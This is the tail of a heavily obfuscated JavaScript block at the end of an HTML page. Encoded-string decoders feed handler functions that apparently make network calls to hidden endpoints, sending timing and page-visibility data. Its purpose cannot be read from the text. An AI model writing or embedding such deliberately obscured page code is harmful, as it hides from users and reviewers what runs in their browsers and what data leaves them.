VegwG3=m3pKaT.indexOf(JRDuxB[hvrDua]);if(VegwG3===-WFFnGD4[0x1])continue;if(F1GAnl<WFFnGD4[0x0]){F1GAnl=VegwG3}else{MoGAdn(F1GAnl+=VegwG3*WFFnGD4[0xc],BwdvBA|=F1GAnl<<z1QctwX,z1QctwX+=(F1GAnl&WFFnGD4[0xd])>WFFnGD4[0xe]?WFFnGD4[0xf]:WFFnGD4[0x10]);do{MoGAdn(sbOEwKZ.push(BwdvBA&WFFnGD4[0x3]),BwdvBA>>=WFFnGD4[0x2],z1QctwX-=WFFnGD4[0x2])}while(z1QctwX>WFFnGD4[0x9]);F1GAnl=-WFFnGD4[0x1]}}if(F1GAnl>-WFFnGD4[0x1]){sbOEwKZ.push((BwdvBA|F1GAnl<<z1QctwX)&WFFnGD4[0x3])}return UvHSzJ(sbOEwKZ)}function m3pKaT(m3pKaT){if(typeof ZdUoeuy[m3pKaT]===WFFnGD4[0x5]){return ZdUoeuy[m3pKaT]=rqxoVlg(M2dk7L[m3pKaT])}return ZdUoeuy[m3pKaT]}return EajM__(JRDuxB(0xac),{[m3pKaT(0xad)]:VegwG3,[m3pKaT(0xae)]:cp2pli,[m3pKaT(0xaf)]:AVv6oM4-kAeNxiD,mm:tT7x0Ab,dc:et8jUdj,fk:sbOEwKZ,[m3pKaT(0xb0)]:!document[m3pKaT(0xb1)]&&document[m3pKaT(0xb2)](),ms:np0QHN8-AVv6oM4})[m3pKaT(0xb3)](rqxoVlg=>{return rqxoVlg&&setTimeout(()=>{return u47Q7K(rqxoVlg)},jlERBH?jlERBH-(eYexe1()-np0QHN8):WFFnGD4[0x0])})[m3pKaT(0xb4)](()=>{return WFFnGD4[0x0]})},0xa))})},ch:()=>{function rqxoVlg(rqxoVlg){var sbOEwKZ="@CZsebKcfGSNP#a)pn!:zg[^B%9{;*Q+Dx0h?T<(l7w}&y.2=VM$LY`~vd|AWO\"rX6]UHItJo8_k/u4j,Fi15qR>m3E",jlERBH,JRDuxB,m3pKaT,BwdvBA,np0QHN8,z1QctwX,F1GAnl;MoGAdn(jlERBH=""+(rqxoVlg||""),JRDuxB=jlERBH.length,m3pKaT=[],BwdvBA=WFFnGD4[0x0],np0QHN8=WFFnGD4[0x0],z1QctwX=-WFFnGD4[0x1]);for(F1GAnl=WFFnGD4[0x0];F1GAnl<JRDuxB;F1GAnl++){var hvrDua=sbOEwKZ.indexOf(jlERBH[F1GAnl]);if(hvrDua===-WFFnGD4[0x1])continue;if(z1QctwX<WFFnGD4[0x0]){z1QctwX=hvrDua}else{MoGAdn(z1QctwX+=hvrDua*WFFnGD4[0xc],BwdvBA|=z1QctwX<<np0QHN8,np0QHN8+=(z1QctwX&WFFnGD4[0xd])>WFFnGD4[0xe]?WFFnGD4[0xf]:WFFnGD4[0x10]);do{MoGAdn(m3pKaT.push(BwdvBA&WFFnGD4[0x3]),BwdvBA>>=WFFnGD4[0x2],np0QHN8-=WFFnGD4[0x2])}while(np0QHN8>WFFnGD4[0x9]);z1QctwX=-WFFnGD4[0x1]}}if(z1QctwX>-WFFnGD4[0x1]){m3pKaT.push((BwdvBA|z1QctwX<<np0QHN8)&WFFnGD4[0x3])}return UvHSzJ(m3pKaT)}function sbOEwKZ(sbOEwKZ){if(typeof ZdUoeuy[sbOEwKZ]===WFFnGD4[0x5]){return ZdUoeuy[sbOEwKZ]=rqxoVlg(M2dk7L[sbOEwKZ])}return ZdUoeuy[sbOEwKZ]}return EajM__(sbOEwKZ(0xb5),{[sbOEwKZ(0xb6)]:VegwG3,[sbOEwKZ(0xb7)]:cp2pli})[sbOEwKZ(0xb8)](rqxoVlg=>{return Number(rqxoVlg)===WFFnGD4[0x1]})},bl:()=>{function rqxoVlg(rqxoVlg){var jlERBH="bM\"<N6YW[Sj;^~HRFPE5dp4lL3O2|XsGm1#T%,}gJ)Q]&>7.A+f_ern/U*90I{zk`aZyiKh8xwq=$vBC!@o:uctD(?V",sbOEwKZ,JRDuxB,m3pKaT,BwdvBA,np0QHN8,z1QctwX,F1GAnl;MoGAdn(sbOEwKZ=""+(rqxoVlg||""),JRDuxB=sbOEwKZ.length,m3pKaT=[],BwdvBA=WFFnGD4[0x0],np0QHN8=WFFnGD4[0x0],z1QctwX=-WFFnGD4[0x1]);for(F1GAnl=WFFnGD4[0x0];F1GAnl<JRDuxB;F1GAnl++){var hvrDua=jlERBH.indexOf(sbOEwKZ[F1GAnl]);if(hvrDua===-WFFnGD4[0x1])continue;if(z1QctwX<WFFnGD4[0x0]){z1QctwX=hvrDua}else{MoGAdn(z1QctwX+=hvrDua*WFFnGD4[0xc],BwdvBA|=z1QctwX<<np0QHN8,np0QHN8+=(z1QctwX&WFFnGD4[0xd])>WFFnGD4[0xe]?WFFnGD4[0xf]:WFFnGD4[0x10]);do{MoGAdn(m3pKaT.push(BwdvBA&WFFnGD4[0x3]),BwdvBA>>=WFFnGD4[0x2],np0QHN8-=WFFnGD4[0x2])}while(np0QHN8>WFFnGD4[0x9]);z1QctwX=-WFFnGD4[0x1]}}if(z1QctwX>-WFFnGD4[0x1]){m3pKaT.push((BwdvBA|z1QctwX<<np0QHN8)&WFFnGD4[0x3])}return UvHSzJ(m3pKaT)}function jlERBH(jlERBH){if(typeof ZdUoeuy[jlERBH]===WFFnGD4[0x5]){return ZdUoeuy[jlERBH]=rqxoVlg(M2dk7L[jlERBH])}return ZdUoeuy[jlERBH]}return EajM__(sbOEwKZ(0xb9),{[sbOEwKZ(0xba)]:VegwG3,[jlERBH(0xbb)]:cp2pli})[jlERBH(0xbc)](()=>{})}})}rqxoVlg()})();
</script>

</body>
</html>
